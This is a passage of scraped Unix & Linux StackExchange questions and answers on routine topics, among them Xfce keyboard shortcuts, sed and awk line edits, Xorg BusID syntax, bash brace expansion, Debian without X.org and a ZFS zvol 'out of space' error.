/home/thmyris/.config/xfce4/xfconf/xfce-perchannel-xml/xfce4-keyboard-shortcuts.xml: <property name="&lt;Alt&gt;F1" type="string" value="xfce4-popup-whiskermenu --pointer"/>

There is another post from 6 years ago about this problem's past incarnation here, but neither that question nor the answers are of use to this problem, sadly.
The Super_L key is not hard-coded to Whisker Menu. Application shortcuts can be accessed in the settings manager: open Settings Manager > Keyboard > Application Shortcuts, or via xfconf-query in the xfce4-keyboard-shortcuts channel:

xfconf-query -c xfce4-keyboard-shortcuts -l

In that channel there could be a property that defines a Super_L key shortcut:

xfconf-query -c xfce4-keyboard-shortcuts -p /commands/custom/Super_L

However, from the output provided...

/home/thmyris/.config/xfce4/xfconf/xfce-perchannel-xml/xfce4-keyboard-shortcuts.xml: <property name="&lt;Primary&gt;Escape" type="string" value="xfce4-popup-whiskermenu"/>
/home/thmyris/.config/xfce4/xfconf/xfce-perchannel-xml/xfce4-keyboard-shortcuts.xml: <property name="&lt;Alt&gt;F1" type="string" value="xfce4-popup-whiskermenu --pointer"/>

...Ctrl+Escape is a key combo set to pop up Whisker Menu at the panel plugin's button, and Alt+F1 is set to pop up Whisker Menu at the current mouse position.

If Super_L still pops up Whisker Menu, most likely there is a daemon running that monitors for a Super_L key press and, when that happens, emulates Ctrl+Escape. There are two applications, that I know of, that fit the description: xcape and ksuperkey. One of these could be installed and set to run on startup. Both run as a daemon and both are used to prevent the Super key breaking other Super key combinations. If it is xcape, the autostart command used to run the daemon is:

xcape -e 'Super_L=Control_L|Escape'

Xcape is in the Debian repos, so it is most likely the one used. In the case of ksuperkey:

ksuperkey -e 'Super_L=Control_L|Escape'

Check which daemon is running and check if there is an autostart entry in the settings: Settings Manager > Session and Startup > Application Autostart.
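A quick sketch to see which (if either) daemon is behind it, and to silence it for the current session:

pgrep -a xcape || pgrep -a ksuperkey   # show the running daemon and its arguments
pkill xcape                            # stop it temporarily; remove its autostart entry to make that permanent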
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/585799", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/405462/" ] }
585,843
I'm developing homepages for myself. The pages look good on my laptop, but I would like to see whether they also look good on my phone. Can I test how the sites look on mobile without first publishing them on the Internet? My laptop runs Ubuntu 20.04.
Firefox and Chromium have Responsive Design Mode : Press Ctrl + Shift + M (For Chromium accessible only in Developer Tools, in Firefox globally)
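To check on an actual phone without publishing anything, serving the pages over the local network also works; a sketch (Python 3 ships with Ubuntu 20.04, and ~/my-homepage is a placeholder for your site directory):

cd ~/my-homepage
python3 -m http.server 8000
# find the laptop's LAN address with: hostname -I
# then browse to http://<that-address>:8000 from the phone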
{ "score": 6, "source": [ "https://unix.stackexchange.com/questions/585843", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/411784/" ] }
585,892
I would like to replace the values 3 and 4 with 0 and 1, respectively, in all fields of the first, third, fifth row and so on until the end of the following data set:

2 4 3 0
2 4 3 0
3 0 4 4
3 0 4 4
4 2 4 3
4 2 4 3
2 3 4 2
2 3 4 2

So, the desired result is:

2 1 0 0
2 4 3 0
0 0 1 1
3 0 4 4
1 2 1 0
4 2 4 3
2 0 1 2
2 3 4 2

I'm using the following code to do that:

awk '{for (i = 1; i <= NR; i=(i+2)) if($i == 3) {$i = 0} if($i == 4) {$i = 1} }END {print $0}' b.temp

However, the output for this code is only the values in the last row of the b.temp file (2 3 4 2). How can I do that? The code needs to do that for any number of rows and fields. The solution can be in awk, sed or another shell alternative. Thanks in advance
With sed:

sed 'y/34/01/;n' file

Which means: replace 3 and 4 by 0 and 1 in this line and print it; get the next line and print it; get the next line and repeat the cycle. This would however fail if the data contained, for example, 14, transforming it to 11. To work around that, opt for

sed 's/\<4\>/1/g;s/\<3\>/0/g;n' file

Those \< and \> match the beginning and end of a word.
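An awk alternative that compares whole fields on odd rows only, so word boundaries never come into play; a sketch:

awk 'NR % 2 { for (i = 1; i <= NF; i++) if ($i == 3) $i = 0; else if ($i == 4) $i = 1 } 1' file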
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/585892", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/362318/" ] }
585,910
From the output of lspci, how do I interpret the BusID for xorg.conf.d? Example:

00:02.0 VGA compatible controller: Intel Corporation Skylake GT2 [HD Graphics 520] (rev 07)
01:00.0 Display controller: Advanced Micro Devices, Inc. [AMD/ATI] Sun XT [Radeon HD 8670A/8670M/8690M / R5 M330 / M430 / Radeon 520 Mobile] (rev 83)

How do I write the BusID for the AMD card? Is this correct?

BUSID PCI 0@1:00:0
In your lspci output, 01:00.0 means bus 1, device 0, function 0, which maps to a BusID specifier of PCI:1:0:0 (without specifying the domain): BusID "PCI:1:0:0" See the xorg.conf documentation for details.
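For context, the BusID usually sits in a Device section of a file under /etc/X11/xorg.conf.d/; a sketch, where the Identifier is arbitrary and amdgpu is an assumed driver (this GCN 1.0 chip may instead want radeon):

Section "Device"
    Identifier "AMD"
    Driver     "amdgpu"
    BusID      "PCI:1:0:0"
EndSection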
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/585910", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/230582/" ] }
586,003
A highly-voted answer here for the question "What's the lightest desktop", which actually tried to quantitatively assess memory use, relies on a Wikipedia page which quotes 2011 data. The newest article I could find dates back to November 2018 (thanks to https://LinuxLinks.com ). Are there newer comparisons which objectively measure memory use?
I think measuring such consumption isn't going to be easy. You can measure it simply by installing the environment into a VM with its default configuration; however, when your configuration changes, so does the memory consumption. You would have to gather some long-term statistics for your workflow. In my eyes it will also differ based on the distribution you are using: Gentoo and Arch Linux will probably show different results than Ubuntu, openSUSE or RHEL. There is also a strategy in Linux to use all available memory. I presume you want to use the GUI on a system where there is not enough memory available. For that you would need to perform your own tests: you would have to see how the environment deals with low levels of memory (whether it can free used memory, whether it stays usable on low-memory systems, etc.). If you want some newer statistics for different environments, you can check this Ubuntu flavours comparison. It does not cover your whole list, but most of it: Comparison Of Memory Usages Of Ubuntu 19.04 And Flavors In 2019 (July)
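For a rough self-measurement right after logging in to a fresh session, a sketch (smem is a separate package and may need installing first):

free -m          # overall used/available memory
sudo smem -t -k  # per-process PSS with a total line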
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/586003", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/49368/" ] }
586,018
I find myself frequently needing to rename different files with mv that are in deep directories:

mv /a/long/path/to/a/file.txt /a/long/path/to/a/file.txt.bak

But I don't want to retype the full path name. Is there a quick shorthand or alias that I could use? I.e.:

$ mv /a/long/path/to/a/file.txt file.txt.bak
$ ls /a/long/path/to/a/file.txt.bak
/a/long/path/to/a/file.txt.bak

(note: this is for straightforward, single file renames in different directories at different times, not for mass-renames)
Use a brace expansion : mv /a/long/path/to/a/file.txt{,.bak} This renames /a/long/path/to/a/file.txt with an empty suffix to /a/long/path/to/a/file.txt with suffix .bak .
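The same trick works in the other direction and for keep-a-copy edits; a couple of hedged examples:

cp /etc/fstab{,.orig}                  # copy before editing
mv /a/long/path/to/a/file.txt{.bak,}   # rename the backup back to the original name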
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/586018", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/382668/" ] }
586,024
I am writing a bash script to help new Linux users install Debian desktop environments easily, but most of these packages rely on xorg. I think it might not work properly if no xorg is found on the target user's machine. I really need to know if there is a Debian Linux distro without xorg and, if so, what do they use? Github link
Debian can be set up without X.org, but the tasks corresponding to all desktop environments which need X.org depend on it (through task-desktop ). Thus installing the appropriate task-based meta-package, using tasksel , will pull in the X.org packages if necessary. The default desktop environment, GNOME, uses Wayland by default in Debian 10, and it is possible to install that without xserver-xorg ; this will use xwayland to run X applications. But the default setup, using GNOME, still installs X.org. (If you want to run GNOME with no xserver-xorg packages, install the base system with no desktop environment, then run apt install --no-install-recommends gnome .)
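For the installer script itself, a hedged sketch that checks up front whether an X server is already present:

if dpkg -s xserver-xorg-core >/dev/null 2>&1; then
    echo "X.org already installed"
else
    echo "no X server found; the chosen desktop task will pull X.org in via tasksel"
fi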
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/586024", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/292716/" ] }
586,151
I'd like to delete a line if it does not start with "a", "c", "t" or "g", and the next line starts with '>'. In the following example, ">seq3" is deleted. Input:

>seq1
actgatgac
>seq2
ctgacgtca
>seq3
>seq4
gtagctagt
>seq5
tgacatgca

Expected output:

>seq1
actgatgac
>seq2
ctgacgtca
>seq4
gtagctagt
>seq5
tgacatgca

I've tried with sed (sed '/^>.*/{$!N;/^>.*/!P;D}' and sed '/^>/{$d;N;/^[aA;cC;gG;tT]/!D}') but got no success.
You could try something like this:

$ sed -e '$!N;/^>.*\n>/D' -e 'P;D' file
>seq1
actgatgac
>seq2
ctgacgtca
>seq4
gtagctagt
>seq5
tgacatgca

That is:

- maintain a two-line buffer with $!N ... P;D
- look for a pattern that starts with > and has another > after the newline
- delete up to the newline
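An equivalent awk sketch that holds each header line until a sequence line confirms it (a header immediately followed by another header is silently dropped):

awk '/^>/ { h = $0; next } { if (h != "") print h; h = ""; print } END { if (h != "") print h }' file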
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/586151", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/411696/" ] }
586,186
On one of my servers, I am running ZFS - no issues during two years. However, today I wanted to create an additional zvol, which only led to an error message stating we were "out of space". The weird thing is that there definitely is enough space:

root@cerberus:/vm-images# zfs list -r -t all
NAME           USED  AVAIL  REFER  MOUNTPOINT
rpool          956G   842G    96K  none
rpool/stretch  926G   842G   926G  /
rpool/swap    29.8G   869G  2.82G  -

root@cerberus:/vm-images# zfs create -b 512 -o checksum=on -o compression=off -o primarycache=none -o redundant_metadata=all -o secondarycache=none -o logbias=latency -o snapdev=hidden -o sync=standard -V 600G rpool/vm-garak
cannot create 'rpool/vm-garak': out of space

So we have 842 GB of space available, but it refuses to create a zvol with 600 GB in size. Any idea what I am doing wrong?

EDIT 1 (as per request of @Jim L.): No reservations are in use:

root@cerberus:/vm-images# zfs list -o name,reservation -r
NAME           RESERV
rpool            none
rpool/stretch    none
rpool/swap       none
A zvol that is not sparse is created with a refreservation covering the worst case the volume could ever consume, which is the data plus all of its metadata. With volblocksize=512 that worst case explodes: every 512-byte block carries its own block-pointer and checksum overhead, so the reservation for a 600G volume ends up well above the 842G you have free. Either use a larger block size (the default is 8K) or create the volume sparse with -s, in which case no refreservation is taken but you must watch pool space yourself.
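A sketch of the two workarounds, reusing the dataset name from the question (other -o options omitted for brevity):

zfs create -b 8192 -V 600G rpool/vm-garak     # larger volblocksize shrinks the worst-case overhead
zfs create -s -b 512 -V 600G rpool/vm-garak   # or sparse: no refreservation, but watch pool space yourself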
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/586186", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/210810/" ] }